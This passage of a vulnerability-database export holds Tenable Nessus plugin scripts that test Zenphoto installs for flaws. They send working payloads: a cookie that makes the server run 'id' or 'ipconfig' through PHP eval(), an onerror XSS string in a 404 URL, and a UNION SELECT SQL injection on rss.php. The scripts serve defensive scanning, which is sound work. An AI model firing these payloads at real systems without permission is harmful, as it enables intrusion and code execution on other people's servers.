(!isnull(pieces[0]))\n version = pieces[0];\nif (!isnull(pieces[1]))\n{\n build = pieces[1];\n version_ui = strcat(version, \" Build \", build);\n}\nelse\n{\n build = NULL;\n version_ui = version;\n}\n\n# Check if versions are the same;\n# if so, check if we have a build\n# number to compare with. Exit if not.\nif (version == fixed_version && isnull(build))\n exit(1, \"The build number of Zenphoto version \"+version+\" located at \"+install_url+\" could not be determined and is needed for comparison.\");\n\n# If versions are the same and build\n# is null, it won't play a part, so\n# set it to text for report output.\nif (isnull(build)) build = 'Unknown';\n\nver = split(version,sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n (\n ver[0] < 1 ||\n (\n ver[0] == 1 &&\n (\n (ver[1] < 4) ||\n (ver[1] == 4 && ver[2] < 2) ||\n (ver[1] == 4 && ver[2] == 2 && ver[3] < 1)\n )\n )\n ) ||\n (version == fixed_version && build < fixed_build)\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version_ui +\n '\\n Fixed version : ' + fixed_version + ' Build ' + fixed_build +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse exit(0, \"The Zenphoto \"+version_ui+\" install at \"+install_url+\" is not affected.\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-17T03:09:32", "references": ["https://www.zenphoto.org/news/zenphoto-1.4.2.1", "https://www.htbridge.com/advisory/HTB23070"], "pluginID": "58456", "description": "The remote host contains a Zenphoto installation that can be abused to execute arbitrary PHP code.\n\nIn the file 'zp-core/zp-extensions/viewer_size_image.php' the value of the cookie 'viewer_size_image_saved' is not properly sanitized before being used in an 'eval()' call. This can allow arbitrary PHP code to be executed on the server.\n\nNote that exploitation requires the 'viewer_size_image' plugin be enabled in the application, which is not the case by default.", "edition": 7, "reporter": "Tenable", "published": "2012-03-23T00:00:00", "title": "Zenphoto viewer_size_image_saved Cookie Value eval() Call Remote PHP Code Execution", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0993"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:zenphoto:zenphoto"], "id": "ZENPHOTO_VIEWER_SIZE_IMAGE_SAVED_CODE_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=58456", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58456);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:19\");\n\n script_cve_id(\"CVE-2012-0993\");\n script_bugtraq_id(51916);\n\n script_name(english:\"Zenphoto viewer_size_image_saved Cookie Value eval() Call Remote PHP Code Execution\");\n script_summary(english:\"Tries to run a command\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by a\ncode execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a Zenphoto installation that can be abused to\nexecute arbitrary PHP code.\n\nIn the file 'zp-core/zp-extensions/viewer_size_image.php' the value\nof the cookie 'viewer_size_image_saved' is not properly sanitized\nbefore being used in an 'eval()' call. This can allow arbitrary PHP\ncode to be executed on the server.\n\nNote that exploitation requires the 'viewer_size_image' plugin be\nenabled in the application, which is not the case by default.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.htbridge.com/advisory/HTB23070\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zenphoto.org/news/zenphoto-1.4.2.1\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Zenphoto 1.4.2.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Zenphoto 1.4.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/23\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zenphoto:zenphoto\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"zenphoto_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/zenphoto\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:'zenphoto', port:port, exit_on_fail:TRUE);\n\ndir = install['dir'];\n\n# Make request for RSS feed to\n# obtain an image url\nforeach rss_url_style (make_list('/index.php?rss', '/rss.php'))\n{\n image_links = make_list();\n url = dir + rss_url_style;\n\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n exit_on_fail : TRUE\n );\n\n # Extract a link to an image\n items = split(res[2], sep:\"<![CDATA[\", keep:FALSE);\n foreach item (items)\n {\n rss_link_matches = eregmatch(pattern:\"^(http.*)\\]\\]><\\/link.*\", string:item);\n\n if (!isnull(rss_link_matches))\n {\n new_dir = ereg_replace(string:dir , pattern: \"\\/\", replace: \"\\/\");\n mypattern = \"^http:\\/\\/[^\\/]+(\"+new_dir+\".*)$\";\n matches = eregmatch(pattern:mypattern, string:rss_link_matches[1]);\n if (!isnull(matches))\n image_links = make_list(image_links, matches[1]);\n }\n }\n if (max_index(image_links) > 0) break;\n}\n\nif (max_index(image_links) < 1)\n exit(0, \"Unable to extract an image URL from the RSS feed for the Zenphoto install at \"+build_url(qs:dir, port:port)+\".\");\n\n# Select the file to read\nos = get_kb_item(\"Host/OS\");\nif (os)\n{\n if (\"windows\" >< tolower(os))\n cmd = make_list('ipconfig /all');\n else\n cmd = 'id';\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\ncmd_pats = make_array();\ncmd_pats['ipconfig /all'] = \"Windows IP Configuration\";\ncmd_pats['id'] = \"uid=[0-9]+\\([^)]+\\) gid=[0-9]+\\([^)]+\\)\";\n\nvuln_found = FALSE;\n\nforeach cmd (cmds)\n{\n command_to_run = 'echo(passthru(\"'+cmd+'\"));';\n\n foreach image_link_to_request (image_links)\n {\n # Make the code execution request\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : image_link_to_request,\n add_headers : make_array('Cookie', 'viewer_size_image_saved='+command_to_run+';'),\n exit_on_fail : TRUE\n );\n\n cmd_pat = cmd_pats[cmd];\n if (\n egrep(pattern:cmd_pat, string: res[2]) &&\n 'function switchimage(obj)' >< res[2] &&\n 'type=\"radio\" name=\"viewer_size_image_selection\"' >< res[2]\n )\n {\n # Get output snippet\n if (\"ipconfig\" >< cmd)\n output_starter = \"Windows IP Configuration\";\n else\n output_starter = \"uid=\";\n\n output = strstr(res[2], output_starter) - strstr(res[2], 'function switchimage(obj)');\n\n # The exploit outputs the executed command output twice\n # We only want one and are choosing the second one with\n # a small bit of context\n output = substr(output, stridx(output, output_starter, 5));\n\n vuln_found = TRUE;\n break;\n }\n }\n if (vuln_found) break;\n}\n\nif (vuln_found)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus was able to verify the issue exists using the following request ' +\n '\\nwhich executed the command \"' + cmd + '\" :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) +\n '\\n' + http_last_sent_request() +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n';\n\n if (report_verbosity > 1)\n {\n report +=\n '\\n' + 'This produced the following output :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) +\n '\\n' + data_protection::sanitize_uid(output:chomp(output)) +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n';\n }\n\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse exit(0, \"The Zenphoto install at \" + build_url(qs:dir, port:port) + \" is not affected.\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-17T02:50:58", "references": ["https://www.zenphoto.org/news/zenphoto-1.4.2.1", "https://www.htbridge.com/advisory/HTB23070"], "pluginID": "58455", "description": "The remote host contains a Zenphoto installation that is affected by a cross-site scripting vulnerability.\n\nUser-supplied input that is appended to the end of a URL is not validated properly before being sent to the browser in a custom 404 page and can result in an attacker-controlled script running in the user's browser.\n\nThe install is also likely affected by several other vulnerabilities, including PHP code execution, SQL injection, and other cross-site scripting issues. This plugin does not, though, check for them.", "edition": 6, "reporter": "Tenable", "published": "2012-03-23T00:00:00", "title": "Zenphoto 404 Error Page XSS", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "CGI abuses : XSS", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0995"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:zenphoto:zenphoto"], "id": "ZENPHOTO_ALBUM_APPEND_XSS.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=58455", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58455);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n\n script_cve_id(\"CVE-2012-0995\");\n script_bugtraq_id(51916);\n\n script_name(english:\"Zenphoto 404 Error Page XSS\");\n script_summary(english:\"Attempts to exploit the vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by a\ncross-site scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a Zenphoto installation that is affected by a\ncross-site scripting vulnerability.\n\nUser-supplied input that is appended to the end of a URL is not\nvalidated properly before being sent to the browser in a custom 404\npage and can result in an attacker-controlled script running in the\nuser's browser.\n\nThe install is also likely affected by several other vulnerabilities,\nincluding PHP code execution, SQL injection, and other cross-site\nscripting issues. This plugin does not, though, check for them.\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://www.htbridge.com/advisory/HTB23070\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zenphoto.org/news/zenphoto-1.4.2.1\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Zenphoto 1.4.2.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Zenphoto 1.4.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/23\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zenphoto:zenphoto\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"zenphoto_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/zenphoto\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:'zenphoto', port:port, exit_on_fail:TRUE);\n\ndir = install['dir'];\nxss = \"<img+src=x+onerror=alert('\"+SCRIPT_NAME+\"')>/\";\n# Request to a non-existent dir\nurl = dir + '/1/nessus_xss_attempt/' + xss;\n\nexpected_resp_1 = 'The Zenphoto object you are requesting cannot be found.<br />Album: 1/nessus_xss_attempt';\nexpected_resp_2 = \"<br />Image: <img src=x onerror=alert('\"+SCRIPT_NAME+\"')>\";\n\nres = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n);\n\nif (expected_resp_1 >< res[2] && expected_resp_2 >< res[2])\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n if (report_verbosity > 0)\n {\n output = (strstr(res[2], 'The Zenphoto object') - strstr(res[2], 'Powered by'));\n\n report =\n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) +\n '\\n' + http_last_sent_request() +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n';\n\n if (report_verbosity > 1)\n {\n report +=\n '\\n' + 'This produced the following output :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) +\n '\\n' + chomp(output) +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n';\n }\n\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse exit(0, \"The Zenphoto install at \" + build_url(qs:dir, port:port) + \" is not affected.\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:56:40", "references": [], "pluginID": "29832", "description": "The version of Zenphoto installed on the remote host fails to sanitize input to the 'albumnr' parameter of the 'rss.php' script before using it in a database query. Regardless of PHP's 'magic_quotes_gpc' and 'register_globals' settings, an attacker may be able to exploit this issue to manipulate database queries, leading to disclosure of sensitive information, modification of data, or attacks against the underlying database.", "edition": 5, "reporter": "Tenable", "published": "2008-01-03T00:00:00", "title": "Zenphoto rss.php albumnr Parameter SQL Injection", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6666"], "modified": "2018-08-07T00:00:00", "cpe": ["cpe:/a:zenphoto:zenphoto"], "id": "ZENPHOTO_ALBUMNR_SQL_INJECTION.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29832", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29832);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/08/07 16:46:50\");\n\n script_cve_id(\"CVE-2007-6666\");\n script_bugtraq_id(27084);\n script_xref(name:\"EDB-ID\", value:\"4823\");\n\n script_name(english:\"Zenphoto rss.php albumnr Parameter SQL Injection\");\n script_summary(english:\"Tries to influence the RSS results returned\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is prone to a SQL\ninjection attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Zenphoto installed on the remote host fails to sanitize\ninput to the 'albumnr' parameter of the 'rss.php' script before using\nit in a database query. Regardless of PHP's 'magic_quotes_gpc' and\n'register_globals' settings, an attacker may be able to exploit this\nissue to manipulate database queries, leading to disclosure of\nsensitive information, modification of data, or attacks against the\nunderlying database.\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(89);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zenphoto:zenphoto\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"zenphoto_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/zenphoto\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nurls = make_list();\nport = get_http_port(default:80, embedded: 0, php:TRUE);\ndirs = get_dirs_from_kb(port:port, appname:'zenphoto', exit_on_fail:TRUE);\n\nforeach dir (dirs)\n{\n # Try to manipulate the RSS results returned.\n magic1 = unixtime();\n magic2 = rand();\n exploit = string(\"9999 UNION SELECT 0,0,0,\", magic1, \",\", magic2, \",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\");\n\n u = string(\n dir, \"/rss.php?\",\n \"albumnr=\", urlencode(str:exploit)\n );\n\n r = http_send_recv3(port:port, method: \"GET\", item: u);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # it's ZenPhoto and...\n \"ZenPhoto Album RSS Generator\" >< res &&\n # we see our magic in the answer.\n string(\"<title>\", magic1, \"<\") >< res &&\n string(\"/a>\", magic2, \"]]\") >< res\n )\n {\n urls = make_list(urls, u);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n }\n}\n\nif (max_index(urls) > 0)\n{\n if (report_verbosity >0)\n {\n report = get_vuln_report(items:urls, port:port);\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse exit(0, \"No vulnerable installs of Zenphoto were found on port \"+port+\".\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
